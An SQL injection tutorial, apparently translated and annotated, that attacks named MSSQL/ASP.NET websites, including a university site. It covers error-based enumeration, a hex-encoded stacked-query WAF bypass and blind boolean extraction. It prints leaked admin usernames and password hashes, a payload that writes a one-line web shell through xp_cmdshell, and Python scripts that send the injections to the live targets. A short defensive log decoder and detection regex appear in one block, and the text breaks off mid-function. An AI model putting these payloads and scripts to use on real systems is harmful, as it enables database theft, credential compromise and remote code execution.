Error-based injection:
- Example: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1
[1] First, leak the version: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0
Error message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' to data type int.
(The target's SQL Server reports this in Chinese: 在將 nvarchar 值 '...' 轉換成數據類型 int 時失敗。 The English text above is the same message as shipped in the English build; the value between the quotes is what matters.)
Why it works: @@version is an MSSQL global variable whose value is nvarchar. In `@@version>0` the other operand is an int, and int has the higher data type precedence, so the server tries to convert the nvarchar value to int. The conversion fails, and the error message echoes the value it could not convert, which is how the server details end up on the page. This needs two things from the application: the id parameter concatenated straight into the query, and raw database errors returned to the client (ASP.NET customErrors off). Parameterised queries remove the injection; hiding the error only removes this oracle, not the blind technique further down.
Likewise, @@SERVERNAME leaks the computer name.
[2] Leak the current database name: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and db_name()>0
Error message: Conversion failed when converting the nvarchar value 'kaifeng' to data type int.
[3] Current user: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()>0
Error message: Conversion failed when converting the nvarchar value 'dbo' to data type int.
PS: 'dbo' means the login is mapped to the owner of the current database. That is usually a sysadmin login, but not always; before relying on xp_cmdshell below, confirm it with `and is_srvrolemember('sysadmin')=1` (the page renders normally when it is true).
[4] Leak the other databases: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
Error message: Conversion failed when converting the nvarchar value 'master' to data type int.
For the next database, exclude the one already seen: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
And so on, adding each leaked name to the list: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','kaifeng'))>0
[5] Tables:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from [database name].sys.all_objects where type='U' AND is_ms_shipped=0)>0
Example:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0)>0
Error message: Conversion failed when converting the nvarchar value 'FRIENDLINK' to data type int.
Next table: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK'))>0
Continue:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK','FRIENDLINK1'))>0
[6] Columns:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
Error message: Conversion failed when converting the nvarchar value 'ID' to data type int.
Next column:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID'))>0
Continue:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID','A_USERNAME'))>0
[7] Data:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 <column> from <database>..<table>)>0
(A table in another database needs the three-part name, database..table or database.dbo.table; a table in the current database can be named directly, as below.)
Example:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 A_PASSWORD from A_WEBADMIN)>0
Error message: Conversion failed when converting the nvarchar value 'B5A1EF8730200F93E50F4F5DEBBCAC0B' to data type int.
(32 hex digits: this looks like an unsalted MD5 hash rather than a cleartext password.)
If the database login has dba privileges and the website's path on disk is known, the same injection point can write a one-line web shell:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--
This works because SQL Server supports stacked queries (the `;` starts a second statement), xp_cmdshell runs a cmd command, and `echo <content> > <file>` writes that content to disk. Two caveats: xp_cmdshell has been disabled by default since SQL Server 2005, so a sysadmin login first has to re-enable it through sp_configure ('show advanced options' and then 'xp_cmdshell', each followed by RECONFIGURE); and the file is written by the SQL Server service account, which must have write access to the web root.
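The enumeration in steps [2] to [6] is always the same loop: leak one name through the conversion error, add it to the `not in (...)` list, repeat until the subquery returns NULL and the page comes back without an error. The following is an added example, not code from the original notes: it writes that loop once, generically, and runs it against a constructed in-memory stand-in for Zixun_show.aspx (the schema below is invented, apart from the names the notes leaked) so it executes offline. To point it at a real target, replace `fake_send` with a function that appends the payload to the id parameter and returns the response body.

```python
# Added example, not from the original notes: the enumeration loop from
# steps [2] to [6] written once, generically. Names are leaked one per
# request by the nvarchar->int conversion error and excluded with
# `not in (...)` until the subquery returns NULL and the page is normal.
# The target is a constructed in-memory schema so the code runs offline.
import re

# SQL Server localises the message; the Chinese text from the notes and the
# English equivalent are both recognised.
ERROR_RE = re.compile(r"nvarchar (?:值|value) '([^']*)'")

# stage -> (column to leak, source to read it from, fixed filter)
STAGES = {
    "databases": ("Name", "master..sysdatabases", ""),
    "tables": ("name", "{db}.sys.all_objects", "type='U' and is_ms_shipped=0"),
    "columns": ("COLUMN_NAME", "{db}.information_schema.columns", "TABLE_NAME='{table}'"),
}


def build_query(stage, seen, **names):
    """`select top 1 X from Y where <filter> and X not in (<seen>)`."""
    col, source, where = STAGES[stage]
    conds = [where.format(**names)] if where else []
    if seen:
        quoted = ",".join("'%s'" % s.replace("'", "''") for s in seen)
        conds.append("%s not in (%s)" % (col, quoted))
    query = "select top 1 %s from %s" % (col, source.format(**names))
    return query + (" where " + " and ".join(conds) if conds else "")


def payload(query):
    """Compare the nvarchar result with an int to force the failing conversion."""
    return " and (%s)>0" % query


def leaked_value(body):
    """The quoted value from the conversion error, or None for a normal page."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def enumerate_names(stage, send, **names):
    """Call send(payload) until it returns a page without a conversion error."""
    seen = []
    while True:
        value = leaked_value(send(payload(build_query(stage, seen, **names))))
        if value is None or value in seen:
            return seen
        seen.append(value)


def dump_schema(send, skip=("master",)):
    """databases -> user tables -> columns, as a nested dict."""
    return {
        db: {t: enumerate_names("columns", send, db=db, table=t)
             for t in enumerate_names("tables", send, db=db)}
        for db in enumerate_names("databases", send) if db not in skip
    }


# ---- constructed stand-in for Zixun_show.aspx (not a real target) ----
# 'kaifeng', FRIENDLINK and A_WEBADMIN come from the notes; the rest is invented.
FAKE_SCHEMA = {
    "master": {},
    "kaifeng": {"FRIENDLINK": ["ID", "URL"],
                "A_WEBADMIN": ["ID", "A_USERNAME", "A_PASSWORD"]},
}
CN_ERROR = "在將 nvarchar 值 '%s' 轉換成數據類型 int 時失敗。"


def fake_send(suffix):
    """Answer like the real page: the conversion error naming the first
    candidate not excluded by `not in`, or a normal page when none is left."""
    tables = re.search(r"from (\w+)\.sys\.all_objects", suffix)
    columns = re.search(r"from (\w+)\.information_schema\.columns where TABLE_NAME='(\w+)'", suffix)
    if "master..sysdatabases" in suffix:
        candidates = list(FAKE_SCHEMA)
    elif tables:
        candidates = list(FAKE_SCHEMA.get(tables.group(1), {}))
    elif columns:
        candidates = FAKE_SCHEMA.get(columns.group(1), {}).get(columns.group(2), [])
    else:
        return "<html>normal page</html>"
    excluded = re.findall(r"'([^']*)'", suffix.split(" not in (")[-1]) if " not in (" in suffix else []
    left = [c for c in candidates if c not in excluded]
    return "<html>normal page</html>" if not left else "<html>%s</html>" % (CN_ERROR % left[0])


if __name__ == "__main__":
    print(dump_schema(fake_send))
```

The loop stops on the first response without an error, which is also what happens when the application starts hiding errors mid-run, so a real driver should distinguish "normal page" from "error page with a different message" before treating the list as complete.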
Injecting past a WAF:
Using hex encoding to get past the WAF:
Example
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi
HackBar's Encoding > HEX Encoding turns the query into a hex literal that can be used as-is, and the error-based technique above then takes the site apart.
Why it works: the WAF matches keywords such as select, convert and @@version in the request, but inside a 0x... literal they are just hex digits. Assigning a binary literal to a varchar variable implicitly converts it back to the original text, and exec(@s) runs that text. The declare/set/exec keywords that stay visible are written in mixed case to slip past case-sensitive signatures (T-SQL itself is case-insensitive). The wrapper needs stacked queries: `'` closes the string in the username parameter, `;` starts the new statement, and `--` comments out the rest of the original query.
[1] Database version:
select convert(int,@@version)  hex-encoded: 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--
Error message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
' to data type int.
[2] Current database
select convert(int,db_name())  hex-encoded:
0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929 eXeC(@s)--
Error message: Conversion failed when converting the nvarchar value 'qds0240012_db' to data type int.
[3] User:
select convert(int,User_Name())
hex-encoded:
0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'dbo' to data type int.
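The hex wrapper is mechanical enough to script, and it is just as mechanical to undo, which is what matters when one of these requests shows up in a web or WAF log. The block below is an added example, not code from the original notes or from HackBar: `stacked_payload` produces the exact `'; dEcLaRe ... eXeC(@s)--` string used above from a plain T-SQL statement, and `decode_hex_exec` recovers the hidden statement from a request the way an analyst would, URL-decoding first because logs hold the encoded form. The log line is constructed for the example; the table-enumeration payload is copied from this page.

```python
# Added example, not from the original notes: builds the hex-wrapped stacked
# payload from a plain T-SQL statement and, for the defender, recovers the
# hidden statement from a request as it would appear in a web server log.
import binascii
import re
import urllib.parse


def hex_literal(sql):
    """Encode the statement as a 0x... binary literal: the WAF sees hex digits,
    not the select/convert/@@version keywords it is looking for."""
    return "0x" + binascii.hexlify(sql.encode("utf-8")).decode("ascii")


def stacked_payload(sql, prefix="niuxinyi"):
    """The wrapper from the notes. Assigning a binary literal to varchar converts
    it back to text; EXEC runs it. Mixed case only defeats case-sensitive
    signatures, since T-SQL keywords are case-insensitive anyway."""
    if len(sql.encode("utf-8")) > 8000:
        raise ValueError("statement does not fit in varchar(8000)")
    return "%s'; dEcLaRe @s vArChAr(8000) sEt @s=%s eXeC(@s)--" % (prefix, hex_literal(sql))


# Defender side: declare/set/exec around a hex literal in a URL-decoded
# request, whatever the keyword case or the variable name used.
HEX_EXEC_RE = re.compile(
    r"declare\s+@(\w+)\s+n?varchar\s*\(\s*\d+\s*\)\s*set\s+@\1\s*=\s*0x([0-9a-f]+)\s*exec\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)


def decode_hex_exec(raw_request):
    """Return the statements hidden inside hex exec wrappers in a request
    (log lines hold the URL-encoded form, so decode that first)."""
    text = urllib.parse.unquote_plus(raw_request)
    return [binascii.unhexlify(h).decode("utf-8", "replace") for _, h in HEX_EXEC_RE.findall(text)]


# Constructed IIS-style log line (not a real capture) carrying the notes'
# "current user" payload URL-encoded, as a web log or WAF would record it.
SAMPLE_LOG_LINE = (
    "2013-05-01 10:00:00 GET /jiuzhu/qiuzhuzhe.aspx username="
    + urllib.parse.quote_plus(stacked_payload("select convert(int,User_Name())"))
    + " 500"
)

# The table-enumeration payload copied from the notes, to show that decoding
# it gives back the query the author hex-encoded.
PAGE_TABLE_PAYLOAD = (
    "niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2028"
    "73656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c"
    "5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929"
    " eXeC(@s)--"
)

if __name__ == "__main__":
    print(stacked_payload("select convert(int,@@version)"))
    print(decode_hex_exec(SAMPLE_LOG_LINE))
    print(decode_hex_exec(PAGE_TABLE_PAYLOAD))
```

A detection rule that only looks for `0x` followed by hex is too noisy (binary literals are common in legitimate traffic); the combination of declare, set to a hex literal and exec of the same variable, matched case-insensitively, is the signature worth alerting on.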
[4] Tables:
select convert(int, (select top 1 name from qds0240012_db .sys.all_objects where type='U' AND is_ms_shipped=0))
(The space before .sys is present in the encoded query; T-SQL tolerates whitespace around the dots of a multipart name, so it is harmless.)
hex-encoded:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929
Injected like this: http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929 eXeC(@s)--
Error message: Conversion failed when converting the nvarchar value 'CMS_ArticleClass' to data type int.
Next table:
select convert(int, (select top 1 name from qds0240012_db .sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'CMS_Career' to data type int.
Continue:
select convert(int, (select top 1 name from qds0240012_db .sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass','CMS_Career')))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'CMS_CareerClass' to data type int.
Tables found (repeating the step above until the page comes back without an error):
'CMS_ArticleClass','CMS_Career','CMS_CareerClass','CMS_Channel','CMS_Comment','Clz_Article','CMS_DrugsClass','CMS_Article','CMS_Fankui','CMS_Hospital','CMS_Message','CMS_Region_City','CMS_Topics','CMS_Region_District','CMS_Region_Province','CMS_SeekHelp','CMS_Sensitive','CMS_ShortMessage','CMS_TopicsClass','CMS_Drugs','CMS_Transaction','CMS_HospitalClass','CMS_Type','CMS_UserGroup','CJ_BianMa','CJ_GuiZe','CJ_IsDown','CJ_Item','CJ_LanMu','CJ_News','CJ_Pic','CJ_Site','Clz_Article_img','CMS_Userinfo','Clz_Channel','Clz_Column','Clz_Comment','Clz_Content','Clz_Image','Clz_Link','Clz_LinkCate','Clz_Model','Clz_Notice','Clz_Product','Clz_Solicitate','Clz_UserHome','CMS_Admin','CMS_AdminGroup','Clz_Video','Clz_WebSite','D99_Tmp','dtproperties','FeedBack','pangolin_test_table','syscommand','UserSign','vw_Channel','vw_Column','xiaolu','zzq_AD_AD','zzq_AD_Class'
(Names like D99_Tmp, pangolin_test_table and syscommand are leftovers of earlier injection tooling, a sign that this database had been attacked before.)
Script for the table enumeration:
# -*- coding: utf-8 -*-
# Leak tables: repeat the hex-wrapped "top 1 ... not in (...)" query, pull
# each leaked name out of the conversion error and add it to the exclusion list.
import binascii
import re
import time
import urllib.error
import urllib.parse
import urllib.request

tables = "''"   # grows into 'A','B',... as names are leaked
for counti in range(100):
    data = "select convert(int, (select top 1 name from qds0240012_db.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in (%s)))" % tables
    hexdata = "0x" + binascii.hexlify(data.encode()).decode()
    urldatatemp = {"username": "niuxinyi';dEcLaRe @s vArChAr(8000) sEt @s=%s eXeC(@s)--" % hexdata}
    urldata = urllib.parse.urlencode(urldatatemp)
    url = "http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?" + urldata
    headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Host": "www.ikcw.com"}
    print(url)
    req = urllib.request.Request(url, headers=headers)
    resul = ""
    try:
        urllib.request.urlopen(req)
    except urllib.error.HTTPError as e:
        # the conversion error comes back as an HTTP 500 whose body carries the name
        resul = e.read().decode("utf-8", "replace")
    math = re.search(r"'(.*)'", resul)
    if math is None:
        break            # no error any more: every user table has been listed
    tablestemp = math.group()   # quotes included, so it drops straight into not in (...)
    print(tablestemp)
    tables = tables + "," + tablestemp
    print(tables)
    time.sleep(10)       # pace the requests
[5] Columns:
select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo'))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f272929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f272929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'id' to data type int.
Continue:
select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id')))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e202827696427292929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e202827696427292929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'username' to data type int.
Continue:
select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id','username')))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e2028276964272c27757365726e616d6527292929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e2028276964272c27757365726e616d6527292929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'nickname' to data type int.
CMS_Userinfo columns:
'id','username','nickname','password','realname','problem','answer','gender','age','adminid','groupid','regip','joindate','lastip','lastvisitdate','digestposts','pageviews','popular','unwelcome','credits','extcredits1','extcredits2','extcredits3','extcredits4','extcredits5','extcredits6','extcredits7','extcredits8','avatar','email','onlinestate','onlineDate','vip','isalliance','status','phone','mobile','qq','msn','address','postcode','sitename','siteIntroduction','website','sitetype','income','expenditure','funds','birthday','province','district','city','logincount','integral','gold','top','headlines','recommend','audit','orderid','healthlevel','professional','post','isdelete','deletestaff','datetime','code','edu','national','remark','photo','usertype','yuyan','fuwuneirong','fuwushijian'
CMS_Admin columns:
'id','username','password','realname','lastloginip','lastlogintime','logincount','allowmultilogin','groupid','groupname'
[6] Data:
select convert(int,(select top 1 username from CMS_Admin))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120757365726e616d652066726f6d20434d535f41646d696e2929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120757365726e616d652066726f6d20434d535f41646d696e2929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'admin' to data type int.
Next, the password:
select convert(int,(select top 1 password from CMS_Admin))
hex-encoded:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f7020312070617373776f72642066726f6d20434d535f41646d696e2929
Injected like this:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f7020312070617373776f72642066726f6d20434d535f41646d696e2929 eXeC(@s)--
Error message:
Conversion failed when converting the nvarchar value 'sOKhmQxCdfzQy8GPXSskPPIV73jEtf0xvNlvUT3LfsoWe6Cw4ZnsqSlsaYhkMJCR' to data type int.
Blind injection:
Example:
http://wenfa.nchu.edu.cn/md.aspx?t=0&c=c1
Two functions first:
substring(str,start,len) cuts a piece out of a string: the first argument is the string, the second the 1-based start position, the third the length of the piece.
ascii(char) returns the ASCII code of a character.
Nothing is echoed back here; the only signal is whether the page renders normally (condition true) or not (condition false). The /**/ comments in the payloads stand in for spaces where a filter blocks them, and the trailing -- comments out the rest of the original query, so the &t=0 after it is only seen by the application, not by SQL Server.
[1] Database version:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>0/**/--&t=0
normal page
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>100/**/--&t=0
abnormal page
So the ASCII code of the first character of @@version lies between 1 and 100.
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))=77/**/--&t=0
normal page, so the code is 77, which is 'M'.
The second character is probed with:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,2,1))>0/**/--&t=0
and so on, the same way.
A script that leaks the version string (the length is found first with len(), then each character by binary search over its code; the normal page is the one larger than 34000 bytes, which has to be re-measured for any other target):
# -*- coding: gbk -*-
import urllib.parse
import urllib.request

sqlcomm = "@@version"    # expression to extract; db_name() etc. work the same way
data = {"t": "0", "c": ""}
headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"}

def page_is_normal(cond):
    """Send the injected c= value; the normal page is the one over 34000 bytes."""
    data["c"] = cond
    url = "http://wenfa.nchu.edu.cn/md.aspx?" + urllib.parse.urlencode(data)
    req = urllib.request.Request(url, headers=headers)
    resul = urllib.request.urlopen(req).read()
    return len(resul) > 34000

def getlength():
    """Probe len(sqlcomm)=0,1,2,... until the normal page comes back."""
    for counti in range(1000):
        if page_is_normal("c1'/**/and/**/len(%s)=%s/**/--" % (sqlcomm, counti)):
            return counti
    return 0

def sendhttp(countn, sign, num):
    """True if ascii(substring(sqlcomm,countn,1)) <sign> num holds."""
    return page_is_normal("c1'/**/and/**/ascii(substring(%s,%s,1))%s%s/**/--" % (sqlcomm, countn, sign, num))

coutnum = getlength()
for j in range(1, coutnum + 1):
    low, high = 0, 140     # binary search over the ASCII range
    while low <= high:
        middle = (high + low) // 2
        if sendhttp(j, "=", middle):
            print(chr(middle), end="")
            break
        if sendhttp(j, ">", middle):
            low = middle + 1
        else:
            high = middle - 1
print()
[2] Current database name
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(db_name(),1,1))>200/**/--&t=0
The page is still normal for a value above 200, i.e. outside the ASCII range, so the database name contains non-ASCII (here Chinese) characters. Switch from ascii() to unicode(), which returns the UTF-16 code of the character: wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/unicode(substring(db_name(),1,1))>200/**/--&t=0
Narrowing down eventually gives:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/unicode(substring(db_name(),1,1))=25991/**/--&t=0
Looked up at http://www.bangnishouji.com/tools/chtounicode.html, 25991 is the character 文 (in Python, chr(25991) gives the same).
Probing the remaining positions the same way, the current database turns out to be 文法學院.
[3] Tables
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/name/**/from/**/文法學院.sys.all_objects/**/where/**/type='U'/**/AND/**/is_ms_shipped=0),1,1))>0/**/--&t=0
Second table:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/name/**/from/**/文法學院.sys.all_objects/**/where/**/type='U'/**/AND/**/is_ms_shipped=0/**/and/**/name/**/not/**/in('Tb_SysUser')),1,1))>0/**/--&t=0
[4] Columns of Tb_SysUser:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/COLUMN_NAME/**/from/**/文法學院.information_schema.columns/**/where/**/TABLE_NAME='Tb_SysUser'),1,1))>0/**/--&t=0
Second column:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/COLUMN_NAME/**/from/**/文法學院.information_schema.columns/**/where/**/TABLE_NAME='Tb_SysUser'/**/and/**/COLUMN_NAME/**/not/**/in('fPwd')),1,1))>0/**/--&t=0
[5] Data
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/fPwd/**/from/**/Tb_SysUser),1,1))>0/**/--&t=0
Each of these is one boolean question; the value comes out by asking it for every position and every candidate code, exactly as for @@version above.
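The version script above stops at code 140 and probes len() one value at a time, so it cannot recover the Chinese database name from step [2]. The following is an added example, not code from the original notes: it generalises the blind extraction to any value by asking unicode() instead of ascii() (16 requests per character over the whole BMP instead of 7 over ASCII) and finds the length by binary search as well. The page is replaced by a constructed oracle so the example runs offline; the two values it holds are the @@version string and the database name this page leaked. Against the real endpoint, `oracle` would be a function that puts the string into the c parameter and returns whether the normal page came back (the 34000-byte test from the notes).

```python
# Added example, not from the original notes: the blind extraction of
# steps [1] to [5] generalised to values with non-ASCII characters, using
# unicode() instead of ascii() as step [2] does for the Chinese database
# name, and with len() found by binary search rather than a linear probe.
# The page is replaced by a constructed oracle so this runs offline.
import re


def length_condition(expr, op, value):
    """The c= value: spaces written as /**/ to dodge a whitespace filter."""
    return "c1'/**/and/**/len(%s)%s%d/**/--" % (expr, op, value)


def char_condition(expr, pos, op, value, func="unicode"):
    return "c1'/**/and/**/%s(substring(%s,%d,1))%s%d/**/--" % (func, expr, pos, op, value)


def _search(ask, top):
    """Smallest v in [0, top] for which ask(">", v) is false, i.e. the value."""
    lo, hi = 0, top
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(">", mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_length(oracle, expr, max_len=4000):
    return _search(lambda op, v: oracle(length_condition(expr, op, v)), max_len)


def extract(oracle, expr, func="unicode"):
    """Recover expr character by character. unicode() covers the BMP in 16
    requests per character; ascii() needs 7 but only works for ASCII."""
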